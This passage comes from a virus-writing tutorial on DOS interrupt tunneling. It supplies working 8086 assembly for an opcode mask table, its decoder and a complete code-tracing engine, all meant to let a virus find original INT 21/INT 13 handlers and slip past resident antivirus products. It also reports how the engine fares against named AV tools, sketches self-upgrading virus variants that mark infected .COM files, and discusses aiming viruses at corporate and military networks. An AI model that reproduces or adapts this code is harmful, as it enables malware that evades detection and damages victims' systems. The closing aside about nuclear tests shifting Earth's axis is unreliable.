000000000xb db 011010000xb, 001000000xb db 000100100xb db 011010000xb, 010000000xb db 011010000xb, 011000000xb ; [RCR|RCL|ROR|ROL|SHR|SHL|SAR|SAL] db 011000100xb db 011110100xb, 011000000xb db 000110010xb db 010000100xb, 000000000xb db 010000100xb, 001000000xb db 000100100xb db 010000100xb, 010000000xb db 010000100xb, 011000000xb ; XCHG/TEST/LEA/POP ; [register/memory], [register/memory] ; MOV [segreg/mem], [segreg/mem] db 011000100xb db 011111111xb, 011000000xb db 001000011xb db 010000011xb, 000000000xb db 010000011xb, 001000000xb db 000110110xb db 010000011xb, 010000000xb db 010000011xb, 011000000xb ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR] ; [reg/mem], immediate (word) <-- WIERD format db 011001000xb db 011111101xb, 011000000xb db 001000011xb db 010000000xb, 000000000xb db 010000000xb, 001000000xb db 000110101xb db 010000000xb, 010000000xb db 010000000xb, 011000000xb ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR] ; [reg/mem], immediate (byte) db 001010100xb db 010000001xb, 000000000xb db 010000001xb, 001000000xb db 001000110xb db 010000001xb, 010000000xb db 010000001xb, 011000000xb ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR] ; [reg/mem], immediate (word) ; Make sure WIERD series is handled first db 011001000xb db 011111111xb, 011000000xb db 001000011xb db 011000110xb, 000000000xb db 011000110xb, 001000000xb db 000110101xb db 011000110xb, 010000000xb db 011000110xb, 011000000xb ; MOV [reg/mem], immediate (byte) db 001010100xb db 011000111xb, 000000000xb db 011000111xb, 001000000xb db 001000110xb db 011000111xb, 010000000xb db 011000111xb, 011000000xb ; MOV [reg/mem], immediate (word) db 011001000xb db 011111111xb, 011000000xb db 001000011xb db 011110110xb, 000000000xb db 011110110xb, 001000000xb db 000110101xb db 011110110xb, 010000000xb db 011110110xb, 011000000xb ; TEST [reg/mem], immediate (byte) db 001010100xb db 011110111xb, 000000000xb db 011110111xb, 001000000xb db 001000110xb db 011110111xb, 010000000xb db 011110111xb, 011000000xb ; TEST [reg/mem], immediate (word) db 000000010xb db 011000111xb db 000110010xb db 000000100xb db 000000101xb ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR] ; acummulator, immediate db 011000100xb db 011110110xb, 011000000xb db 000110010xb db 011110110xb, 000000000xb db 011110110xb, 001000000xb db 000100100xb db 011110110xb, 010000000xb db 011110110xb, 011000000xb ; [CALL|DEC|INC|JMP|PUSH|???] reg/memory ; [NOT|NEG|MUL|DIV|IMUL|IDIV|???] reg/memory ; Also handles TEST by accident... so make ; sure this is *AFTER* TEST cases have been ; handled else we'll use the wrong formula instruction_table_end: ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Section 5: Complex mask table decoder ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Well all that was nice and fine. We have our table definition, and we have our table, except, all this is useless if the computer doesn't understand our table format, and as such, we need to start writing a decoder which will accept an opcode and work out the full length of the instruction by decoding the table entry fields until it finds a match. Before we start, let's make a few assumptions. The first assumption, is that we've already handled all the other opcodes we need to, such as any segment overrides. Also, we handle all our JMPs/CALLs etc earlier on because they're special instructions and we don't want them intefering with our table. For our little routine, we'll assume our instruction is in AX on entry and that we return the number to add the IP in the AX register. BX will also be cleared to indicate a successfull match. If we don't find a match, however, we set BX=1 and AX=1. entry_ax dw 0 ; AX on entry to table decoding routine cmp_loops db 0 ; number of CMPs left to process need_fixup db 0 ; FIXUP flag table_decoder proc near push cs pop es mov [es:entry_ax], ax lea di, [instruction_table_start] jmp decode_start decode_equal: cmp [es:need_fixup], 0 je no_fixup mov ax, [es:entry_ax] and ah, 011000111xb cmp ah, 0110xb jne no_fixup add dl, 2 no_fixup: mov al, dl cbw xor bx, bx ret decode_error: mov ax, 1 mov bx, 1 ret decode_start: cmp di, offset instruction_table_end je decode_error mov ax, [es:entry_ax] mov bl, [es:di] and bl, 01111xb mov [es:cmp_loops], bl mov cl, [es:di] mov bl, [es:di] and cl, 001000000xb mov [es:need_fixup], cl inc di and bl, 010000000xb jz byte_entry word_entry: mov bx, [es:di] and ax, bx inc di inc di word_do_cmp: mov dl, [es:di] and dl, 01111xb mov bx, [es:di+1] cmp ax, bx je _decode_equal dec [es:cmp_loops] jz word_next_first mov dl, [es:di] mov cl, 4 shr dl, cl mov bx, [es:di+3] cmp ax, bx je _decode_equal add di, 5 dec [es:cmp_loops] jnz word_do_cmp jmp decode_start word_next_first: add di, 3 jmp decode_start _decode_equal: jmp decode_equal byte_entry: mov bl, [es:di] and al, bl inc di byte_do_cmp: mov dl, [es:di] and dl, 01111xb mov bl, [es:di+1] cmp al, bl je _decode_equal dec [es:cmp_loops] jz byte_next_first mov dl, [es:di] mov cl, 4 shr dl, cl mov bl, [es:di+2] cmp al, bl je _decode_equal add di, 3 dec [es:cmp_loops] jnz byte_do_cmp jmp decode_start byte_next_first: inc di inc di jmp decode_start table_decoder endp Our decoder turns out to be 216 bytes long, so, adding up both our decoder and complex mask table sizes we come out with just 469 bytes. This may seem a mite bit large, considering the old method is 1 byte big (just an INC SI) but, at least we are safe from MOV instructions and the like, which all of the 'lesser' code tracers are prone to. The code I've written is, well, fairly optimized but it I guess if you rewrote it you could squeeze more bytes out, however this one shall do for us. The problem with complex tables is that the code size needed to decode them increases with the space saved on the actual table itself, as the more space saved, the greater the complexity, the longer it takes to decode. Making the table more complex and shaving 200 bytes off of the table size, could easily add 200 bytes to the decoder size making your effort fruitless, and simplifying the table will increase total size more than that which will be made up by reduced decoder size. Alright, so, we have 469 bytes we might want to compress this down a bit further, how would we do this? To put it simply, we'd need a complete rewrite with something OTHER than a complex mask table, ie, totally changing the definition to something new and exciting. I have a few ideas of this, and maybe it can get our total size down to 300 bytes or so, around that margin, above, or below, I'm not sure as I haven't coded it/tried it out yet. If any of my ideas work out you'll see them in document three as we need a similar system for handling strange opcodes when you learn about PSP tunneling. But don't hold your breath ;) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Section 6: Algorithms for our code tracing engine ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Well, now we have to talk about algorithms... when we write our engine how exactly it is going to work. Don't just be thinking there's only one main way of doing things... as there are many ;) The main differences come in how you treat conditional jumps, which opcodes you follow or ignore, and any extra features you include to enhance the capability of avoiding crashes. There are 4 different methods of handling conditional jumps (none of which we'll be using, hehehe). Traditional tracers either ignore them, follow ALL of them, alternate between following one and skipping one, or alternatively, they just randomly chose to follow or ignore each jump as it is encountered. By being able to toggle between the different methods in your scanner, you can setup a routine that calls the tracer to retrace the interrupt with each methodology, hoping that at least one will work. To put it simply, there is a variale which the tracer uses to know which type of handling it uses for conditional jumps, which is set constantly during the first trace. Then, the tracer updates this variable to the next tracing method, and runs through the complete tracing pass again, and so on until there are no passes left, or a pass is successfull. This isn't too hard, and is a fairly stable approach to the conditional jump problem. However, this is a fairly haphazard approach, and although working extremely well in some cases, it will fail horribly in others. Also, it is very slow, since we have to retrace the entire interrupt chain numerous times, and due to the random type of handling (choosing what to do with each conditional jump as it comes along, one of the 4 methods of conditional jump handling), we could trace through properly one day, but not the next. Either way, handling conditional jumps is a *BIG* problem for tracers, so we need the *GREATEST* reliability possible, and as such, we will not use any of these methods. No, the method we'll use is far more eloquent :) First of all, we make IRET/RETN/RETF all use the very same RETF code... and CALL/CALLFAR both use the same CALLFAR code. The reason we save the full DS:SI even for near calls will become apparent later. Anyway, since we always save DS:SI, we can abandon all our different RET code and just have one handler which always pops DS:SI. On top of this, we setup a counter variable (initialized to 0300H on entry to the engine), which is decremented on each instruction that is traced. Whenever we see a CALL, we save this instruction counter on the stack, and whenever we see a RET, we pop the value back into the instruction counter variable. Now that you know that, you can also know that we will trace conditional jumps just as if they were a CALL instruction. Also, as a last resort, we have a global counter variable that we NEVER SAVE, we only increment it, and if it reaches a certain value, we know we've been tracing for way too long and we abort the trace. You should see where this is leading. With one constant length of values pushed on the stack (3 words - instruction counter, DS, SI) it is harder to confuse our tracer's stack and screw us over. Also, with a RETF every time our counter flips over... we are able to trace EVERY possible path of execution flow in the interrupt handler, giving us *THE* most reliable tracing method available, while still maintaining the integrity of our counter and is also a good mini-failsafe so if we trace into the wrong part of memory we won't die. As you know, when the very first counter variable runs out... the original values we pushed onto the stack in our tracer setup will be popped off, changing our stack to the value the stack was when we first entered the tracing engine... trigering the code which stops our stack from starving to death, aborting the trace :) Okay, so, now we only have one more thing to deal with that you haven't learnt about yet. Take a look at the code shown below (this is taken from... part of the interrupt code in SMARTDRV I think, somewhere along the INT 13 chain). It is *REAL LIFE* stuff, so, be warned, it's potent :) 185D:0156 8BB73601 MOV SI,[BX+0136] 185D:015A 85F6 TEST SI,SI 185D:015C 740A JZ 0168 185D:015E 3B843801 CMP AX,[SI+0138] 185D:0162 7304 JNB 0168 185D:0164 8BDE MOV BX,SI 185D:0166 EBEE JMP 0156 185D:0168 89BF3601 MOV [BX+0136],DI 185D:016C 89B53601 MOV [DI+0136],SI 185D:0170 C3 RET Okay, so, what's such a big deal about this you ask? Well, it puts our tracer into an infinite loop (that is, until our global instruction counter runs out or the stack runs out and trips our anti-crash code). The answer to our problem is simple. Whenever we save our counter, DS, and SI on the stack, we check to see if the DS:SI is already ON the stack, and if it is, we simply don't follow the call/conditional jump, skipping it instead. So, now you know how we're going to handle CALL/IRET/conditional jumps, and you also know about all the anti-crash code we're going to include, and since you already know about all the other opcodes we have to deal with, and everything you'll ever need to know about coding the tracer, it's time to actually go ahead and write it! These are the return codes: BL=0 DS:SI holds original interrupt entrypoint BL=1 DS:SI holds the instruction which completed our trace through the interrupt chain (not an error) BL=2 DS:SI holds last instruction executed before global counter ran out BL=3 DS:SI holds last CALL which caused our stack to overflow stack_top dw 0 ; do not POP past this point stack_bottom dw 0 ; do not PUSH past this point override db 02eh ; segment overrides variable loop_counter dw 0300h ; how many instructions (loops) we've processed first_mcb dw 0 ; abort when our segment is below this value (INT 21) temp_ip dw 0 ; temporary storage for stack searching temp_store dw 0, 0 ; temporary storage for stack searching global dw 0 ; global abort counter scan_setup: mov [cs:stack_top], sp mov ax, cs mov bx, ss cmp ax, bx je stack_fixup mov ax, 020h jmp stack_setup stack_fixup: lea ax, [offset program_end] add ax, 020h stack_setup: mov [cs:stack_bottom], ax mov [cs:loop_counter], 0300h mov ah, 052h int 021h mov ax, [es:bx-2] mov [cs:first_mcb], ax mov ax, 03521h int 021h push es pop ds xchg bx, si xor ax, ax push ax push ax push ax scan_begin: mov [cs:override], 02eh mov ax, ds cmp ax, [cs:first_mcb] jae scan_prefix mov bl, 0 mov sp, [cs:stack_top] ret scan_prefix: dec [cs:loop_counter] jz do_ret_far dec [cs:global] jz global_error cmp si, 0fffah jae do_ret_far mov ax, [si] push ax and al, 011100111xb cmp al, 000100110xb ; check for segment overrides pop ax je prefix_found push ax and al, 011110000xb cmp al, 001110000xb ; check for conditional jump series pop ax jne scan_ret_opcode do_conditional_jump: mov ax, si inc ax inc ax call call_finish jmp do_jump_short prefix_found: mov [cs:override], al inc si jnc scan_prefix jmp do_ret_far global_error: mov bl, 2 mov sp, [cs:stack_top] ret scan_ret_opcode: cmp al, 0cfh je do_ret_far ; check for IRET push ax and al, 011110110xb cmp al, 011000010xb ; check for RET[N|F] pop ax jne scan_flow_opcodes do_ret_far: mov ax, sp add ax, 6 cmp ax, [cs:stack_top] jae scan_root_exit pop si pop ds pop [cs:loop_counter] jmp scan_begin scan_root_exit: mov bl, 1 mov sp, [cs:stack_top] ret do_jump_short: mov al, [si+1] cbw add si, ax inc si inc si jmp scan_begin do_jump_near_immed: add si, [si+1] add si, 3 jmp scan_begin do_jump_far_immed: mov ax, [si+3] mov si, [si+1] mov ds, ax jmp scan_begin do_jump_near_mem: cmp [cs:override], 02eh jne do_ret_far mov si, [si+2] mov si, [si] jmp scan_begin do_jump_far_mem: cmp [cs:override], 02eh jne do_ret_far mov si, [si+2] mov ax, [si+2] mov si, [si] mov ds, ax jmp scan_begin scan_flow_opcodes: cmp al, 0ebh je do_jump_short cmp al, 0e9h je do_jump_near_immed cmp al, 0eah je do_jump_far_immed cmp al, 0ffh jne scan_flow_opcodes_next push ax and ah, 0110000xb cmp ah, 0100000xb pop ax jne scan_flow_opcodes_next push ax and ah, 011000111xb cmp ah, 000000110xb pop ax jne _do_ret_far ; weird JMP/CALLs we can't handle (which use ; registers, weird offset bytes, etc, etc, etc) cmp ah, 026h je do_jump_near_mem cmp ah, 02eh je do_jump_far_mem cmp ah, 016h je do_call_near_mem cmp ah, 01eh je do_call_far_mem scan_flow_opcodes_next: cmp al, 0e8h je do_call_near_immed cmp al, 09ah je do_call_far_immed scan_unknown_opcodes: call table_decoder cmp bx, 0 jne _do_ret_far add si, ax jc _do_ret_far jmp scan_begin _do_ret_far: jmp do_ret_far do_call_near_mem: call call_setup add ax, 4 jc _do_ret_far call call_finish jmp do_jump_near_mem do_call_near_immed: call call_setup add ax, 3 jc _do_ret_far call call_finish jmp do_jump_near_immed do_call_far_immed: call call_setup add ax, 5 jc _do_ret_far call call_finish jmp do_jump_far_immed do_call_far_mem: call call_setup add ax, 4 jc _do_ret_far call call_finish jmp do_jump_far_mem call_setup: pop bx mov ax, sp sub ax, 6 cmp ax, [cs:stack_bottom] jbe _stack_error mov ax, si push bx ret _stack_error: mov bl, 3 mov sp, [cs:stack_top] ret call_finish: pop [cs:temp_ip] mov [cs:temp_store], ax mov [cs:temp_store+2], ds push ss pop ds xchg si, bp mov si, sp mov bx, si call_loop: lodsw cmp ax, [cs:temp_store] jne call_nomatch lodsw cmp ax, [cs:temp_store+2] je call_match_found call_nomatch: add bx, 6 mov si, bx cmp si, [cs:stack_top] jb call_loop call_exit: push [cs:loop_counter] mov ax, [cs:temp_store+2] push ax push [cs:temp_store] push [cs:temp_ip] xchg bp, si mov ds, ax ret call_match_found: mov si, [cs:temp_store] mov ax, [cs:temp_store+2] mov ds, ax jmp scan_begin program_end: Yay! We turned out to be 528 bytes long (with optimisations... this could become quite a bit smaller). With the added size of the decoder and complex mask table, we turn out to be 997 bytes long! We fit into 1k, which was my secret goal for the whole document :) Of course, with optimizations I'm sure you could get this down to at least 700 bytes small. And how well do we work? Well, so far, with all my tests, this has tunneled INT 21 properly under ANY working combination of QEMM/SoftIce (2.8, dos version)/HIMEM/EMM386/TBAV resident software/F-PROT's VIRSTOP, as well as my own anti-single-step-tunneler TSR code (hehehe, you can't be too carefull). Strangely enough, it won't tunnel past VSHIELD by mcafee, only the lamest crappiest most sickening AV product on the planet!!!! SHRIEK! However, with INT 13 tunneling, we run into serious problems. Under DESQView (with or without anything else loaded), our global counter runs out... under DESQView+QEMM+SMARTDRV, we get a return value but it won't work properly. Under plain DOS, with nothing loaded, we will tunnel okay, and the same if we run just QEMM or EMM386, -UNLESS- 'SMARTDRV' is loaded, in which case we will never tunnel properly. To make things even stranger, some people are telling me that this tracer is giving them completely different results than what I've said! For instance, they say it tunnels both i13 and i21 correctly... some say it tunnels i13 correctly but not i21... etc etc. Why is this so? Well, to put it simply, I have no idea ;) I think the tracer itself has some inbuilt bugs... especially with the recursion... but... I have not been able to track anything down :( ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Section 7: Additional notes on CMT's ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ This section is about notes on CMT's... problems you need to take into consideration and also IDEAS about how you can use them. No code is included in this section, as it's all theory, you can develop your own code. Hey, your mommy may hold your pee-pee when you go to the toilet but that way you'll never learn how to hold your pee-pee for youself... I'm throwing you into shark infested waters so you can learn how to swim, or die ;) Just don't piss everywhere, okay? Okay, well, first things first, complex mask tables aren't perfect, and they are actually quite dangerous to our tracer if used incorrectly. Your tracer is pretty much just as good as its complex mask table. If your complex mask table misses even *ONE* instruction, then your WHOLE trace will be totally stuffed up. The reason for this is that after you skip the first opcode (because of the error returned by the decoder)... the decoder handles the NEXT instruction, which it gives a value back for, such as 4 thinking it is a proper instruction, and this continues on its misaligned path. You can see how this destroys our trace, even moreso than if we ditched CMT's and used INC SI. The tracer above, however, uses the error codes from the decoder to decide what to do. If an unknown instruction is found, then we skip this path and try the last saved DS:SI value on the stack. This is better than following through on our dangerous course, however, if EVERY path of execution goes through this bit of code, we might have been better off tracing through and ignoring the error. Maybe a more stable method, would be to trace up to the next 'important instruction' using the INC SI method, and then turn the decoder back on. Of course, then we could be fooled using a MOV instruction ;) Both ways are flawed and there is nothing you can do about it except try to include as much into your mask table as possible. For instance, my mask table needs addition of 186+ instructions, as well as any 8088 instructions I may have missed (hopefully not many... but I bet there's just one or two, I'm not perfect yaknow). Also, in TBAV and many other AV products, 386+ only code is becoming more common, which may cause problems for our CMT. However, luckily, due to the cruddy way the TBAV drivers load up in memory, our tracer tunnels through them before it reaches these 386 opcodes ;) This could change in upcoming versions of TBAV, however. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Evolution and CMT's ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ This is a little off-topic, since this is a document on tunneling, not evolution code, but, either way, since I gave you the CMT (complex mask table), I should give you some more hints on helping it work for YOU! Heck, they're bloody big, you might as well get the most you can out of them, and so, I created this mini-section ;) It's easy to include evolutionary code in your virus ;) Imagine that all your viruses use complex mask tables for one reason or another, and each time you write a virus you include a more up to date, smaller, faster, etc, complex mask table. Now, in every virus you write, you set it up so that in each file you infect, the .COM files have the initial instructions like: .COM file: org 0100h jmp VIRUS_BEGIN ; bootstrap virus code db 'CMT' ; marker dw (delta_offset+offset CMT_HEADER) ... rest of .COM file ... VIRUS_BEGIN: ... VIRUS ... If you were infecting EXE's too, you could save the offset of the CMT in the file at a specific byte somewhere, or store the information in the header, etc, wherever suits you best, but for simplicity, I'll only give examples for .COM ;) Anyway, you should see a good idea solidifying here ;) For each virus you write, it uses a different version of complex mask table. Every virus you write, also has the ability to grab the offset in a file of that complex mask table by looking at the word value after the 'CMT' marker. Then, it can index the header to the CMT which looks like this: CMT_HEADER: VERSION: dw 0 LENGTH: dw (offset instruction_table_end-offset instruction_table_start) instruction_table_start: ... CMT goes here ... instruction_table_end: VERSION could simply be a number, such as if you're incrementing it each time you add... else it could be different and set out into bitfields... ie: 386+ opcodes, size optimized, speed optimized, (revision byte), etc. After this, inside your virus, you can include code to scan other files as it infects them for the marker of another variant of your virus, and make decisions about wether it should upgrade its complex mask table to the new version. For instance, if running on an XT computer with version 1 of a 386+ mask table, it might find a variant running with an 8088+ speed/size optimized version... so it upgrades ;) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Section 8: Flaws in code tracing ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Code tracers have never been too popular, mostly because of the flaws in the actual design of the code tracer itself in not being able to follow through all types of execution flow, and as such, you'd be hard pressed to find any decent virus using code tracing in the form I have shown you here. However, code tracing does have OTHER uses, a few of which you'll learn about in the next document in this series. Until then, it's time to delve into how certain code constructs can fool tracers. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Anti-tracing with opcodes ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ The number one way to beat a tracer, is to throw in unusual opcodes into the code you suspect will be traced by the tracer. To beat the simpler tracers, all that is needed is a MOV instruction with the right values after it such as MOV AL, 0E9H! However, since tracers should now be coming out with proper opcode identification schemes such as complex mask tables, such a code fragment will probably not suffice. This is where 286+, 386+, and co-processor instructions can help out. For example, the currently supplied complex mask table, while (hopefully) handing the simpler co-processor instructions, will choke on a simple MOV EAX, 0E9H! ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Dealing with anti-tracer opcodes ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Anti-tracing via strange opcode isn't very likely, and won't always work anyway. By adding in instructions which will only work on a specific series of processor, AV products cut out various users from their potential customer market, not that they'd use such a nonsensical section of anti-tracer code in the first place. Also, it wouldn't be too hard to upgrade the complex mask table to handle 386+ instructions and the like, and the same should be true for other opcode identification schemes. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Anti-tracing with conditional jumps ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ An easy way to fool normal tracers would be a simple section of code like that shown below. This takes advantage of the flaw in tracers that prevents it from actually knowing which conditional jumps to take. Only the simplest of tracers would be caught by THIS check... and our tracer will definately bypass it. However, long series of conditional jumps pose a very real threat to tracers which don't take appropriate precautions. clc jc scanners_here stc jc scanners_not_here scanners_left_here: ... scanners_not_here: ... ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Dealing with conditional jumps ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ You don't really need to worry about conditional jumps, as the tracer I showed you how to write in the last section deals with them easily. Even never-ending conditional jumps are no threat to our tracer, as it has been built to handle all conditional jump conditions with the most robust error checking system I could think of. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Anti-tracing with spaghetti code ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ The number one way to beat code tracing is simply using confusing code. For example, hiding bits of code in interrupt handlers, using interrupts to get work done, calling previous interrupt handlers in strange ways, messing with a code tracer's stack, etc, will all work. Even using null registers in CALL instructions and modifying code on the fly will work well. There is no defense against complex code. Here are a few examples: lea ax, [go_here] jmp ax ; Using a register for a jump, scanners chuck go_here: lea ax, [go_here_next] mov [cs:go_here_data], ax jmp [cs:go_here_data] ; Flow modification on the fly go_here_data dw 0 go_here_next: mov [cs:go_here_data], 0 ; Cover our tracks ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Anti-tracing with stack manipulation ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Stack manipulation is also a way to fool tracers. For example, we save the IP or CS:IP of our destination on the stack, and issue a RETN/RETF :) This is generally bad news for scanners that will become confused by the RETN/RETF. There is no real solve for this, however, the problem could be slightly alleviated by some code I'll give you in document 3 ;) mov ax, offset i_wanna_go_here push ax ret jmp far 0:0 ; Just in case we're dealing with a stupid scanner ; like Khontarks which doesn't recognize the RET i_wanna_go_here: ... ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Section 9: How usefull are code tracers? ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Code tracers are of varying usefullness. Before you start coding one of your own for use in your viruses, you have to compare its good and bad points against the other tunneling technology you have already learnt about, single step tunneling. Single step tunnelers are small, reliable, but detectable. Code tracing on the other hand is large, unreliable, and undetectable. The size however, depends on how much reliability you want, as you can just totally ditch my complex mask table definitions and decrease the total codesize to something close to the size of a decent single step handler by adding in the 'INC SI' instruction. This still hasn't answered your question right? Well, here's something for you to think about. Where are you planning for your virus to spread? If it's going to be just crappy home computers, what do you think is the percentage of them running software able to detect single step tunnelers? I heard the percentage is VERY small, as most people depend upon SHIT AV software such as SCAN by mcafee and NAV by symantec. This means, the instances of you being caught are far outweighed by the extra computers you are going to infect using original interrupt entrypoints. However, say you're infecting a more 'up-market' computer system, such as a large networked company. This company may be your only target, or one of the main ones, and ANY detection of your virus on the system would TOTALLY screw over your plans. In an instance such as this, you'd use a code tracer, since not being detected is a VERY high priority. Then again, if this place you were tunneling was *VERY* high security, such as REALLY big badass corporations or military bases, etc (hehehe), then you'll be wanted BOTH *HIGH reliability* and undetectability of your tunneler. This is because code tracing does not always find the original interrupt entrypoint, and if you don't have that, you can't bypass AV software in memory, meaning your virus will be detected. Meanwhile, you can't use single stepping because, quite frankly, it will be detected by the very AV software you need to bypass. What would you do in such a situation? Don't fret! There's two more documents left in this series remember? You have *MUCH* to learn before you start aiming so high as defense networks! Your best bet now is to simply wait for the other two documents and read them before adding the tunneling code into your virus :) One thing to remember, is that no matter how good anti-tracing code is in an AV tsr... it doesn't matter. Although tracers have flaws, they have one major advantage over conventional single step tunneling techniques, they cannot be detected. This means that, even if we DON'T find our original interrupt entrypoint from within our tracer, it doesn't matter, our presence, as far as AV software is concerned, is still concealed, which is, in many cases, very important. Alternatively, you can use a combination of BOTH single stepping and code tracing. For instance, you could tunnel in a certain distance (before any errors start coming up, but just after certain AV software hooks), and then start the single step routine. Or you could simply use the single step routine if your tracing routine was unsucessfull. Heck, you could make a SUPER tunneling virus, which uses every type of tunneling known to man (shown in all of my 4 documents, hehehe) one after the other, until it grabs the original entrypoint, starting with the undetectable ones, and going down to single step tunnelers (each using a different method of finding the original interrupt entrypoint). Yay! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Section 10: Conclusion ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ As you can see, code tracing has both benefits over other methods, and pitfalls as well. In the next document in our series, you'll add to your tunneling method repetoir with many other miscellaneous methods, which have more reliability than code tracing with the same benefit of undetectability. You should keep the idea of complex mask tables fresh in your mind, as they'll make a comeback (either in the same format or a new and improved version) in the next document. Once again, to round of the document it's suggested you read and try out the example program I wrote. It is basically just everything you've learnt so far, with all the code from the document in a tunneling program so you can actually see the results of your tunnel. Code tracing is not affected by DESQview (except for more unreliability) so no checks for it are included in the program. With my version of DESQview, the code tracer handles it fine though :) How well your tunnelers work under DESQview is a good indicator of how they'll work in the wild, as DESQview uses some *VERY* tricky and spaghetti like code in its interrupt handlers. So now that you know all there is to code tracers, I hereby dub thee a human. Yes, you have evolved past the stage of safe and pleasant marsupial like interaction with the environment to the supposedly 'better' stage of manipulating the environment to get what you want without regards to its health, slowly killing the planet and all other life on it. Congratulations, you can now contribute your filth to human society. Did you know that nuclear test are SHIFTING the axis of the Earth slowly? This means that in a few years time, the earth will be tilted differently, which means all the seasons are going to change, the polar icecaps are going to melt, and basically, we're all going to die. Now don't you wish you were a cockroach? Anyway, once again, I hope you enjoyed this document as much as I hated writing it. I thought the last document was a fucker... but this was even worse. Do you have ANY idea how long it took me to get complex mask tables working, let alone the example tables themselves and all the tracing code? 